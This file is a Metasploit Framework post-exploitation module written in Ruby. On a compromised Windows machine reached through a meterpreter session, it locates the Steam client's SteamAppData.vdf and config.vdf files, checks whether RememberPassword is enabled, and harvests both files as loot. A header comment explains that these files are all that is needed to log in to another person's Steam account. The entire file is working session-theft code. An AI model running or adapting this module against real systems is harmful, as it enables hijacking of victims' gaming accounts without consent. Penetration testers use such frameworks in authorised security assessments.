metasploit-framework/modules/post/windows/gather/credentials/steam.rb

86 lines
2.7 KiB
Ruby
Raw Normal View History

##
# $Id: steam.rb
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
##
# All that is needed to login to another Steam account is config.vdf,
# setting the AutoLoginUser to the proper username and RememberPassword
# to 1 in SteamAppData.vdf.
# Only tested on Win7 x64
#
# config.vdf , ContentCache element holds a K,V table of what appears
# to be UniqueID, Session. This is purely speculation as I have not
# reversed it to check. However the key is always unique to the account
# and the value changes whenever the account is logged out and then
# back in.
##
require 'msf/core'
require 'msf/core/post/file'
class Metasploit3 < Msf::Post
include Msf::Post::File
include Msf::Auxiliary::Report
def initialize(info={})
super( update_info(info,
'Name' => 'Steam client session Collector.',
'Description' => %q{ This module will collect Steam session information from an
account set to autologin. },
'License' => MSF_LICENSE,
'Author' => ['Nikolai Rusakov <nikolai.rusakov[at]gmail.com>'],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter' ]
))
end
def run
drive = expand_path('%SystemDrive%')
steamappdata = 'SteamAppData.vdf'
steamconfig = 'config.vdf'
u_rx = /AutoLoginUser\W*\"(.*)\"/
# Steam client is only 32 bit so we need to know what arch we are on so that we can use
# the correct program files folder.
# We will just use an x64 only defined env variable to check.
if not expand_path('%ProgramFiles(X86)%').empty?
progs = drive + '\\Program Files (x86)' #x64
else
progs = drive + '\\Program Files' #x86
end
path = progs + '\\Steam\\config\\'
print_status("Checking for Steam configs in #{path}")
# Check if all the files are there.
# I know the path[0..-2] is ugly but directory? does not permit trailing slashes.
if directory?(path[0..-2]) && file?(path+steamappdata) && file?(path+steamconfig)
print_status("Located steam config files.")
sad = read_file(path+steamappdata)
if sad =~ /RememberPassword\W*\"1\"/
print_status("RememberPassword is set! Accountname is #{u_rx.match(sad)[1]}")
scd = read_file(path+steamconfig)
store_loot('steam.config', 'text/plain', session, sad, filename=steamappdata)
store_loot('steam.config', 'text/plain', session, scd, filename=steamconfig)
print_status("Steam configs harvested successfully!")
else
print_error("RememberPassword is not set, exiting.")
return
end
else
print_error("Steam configs not found.")
return
end
end
end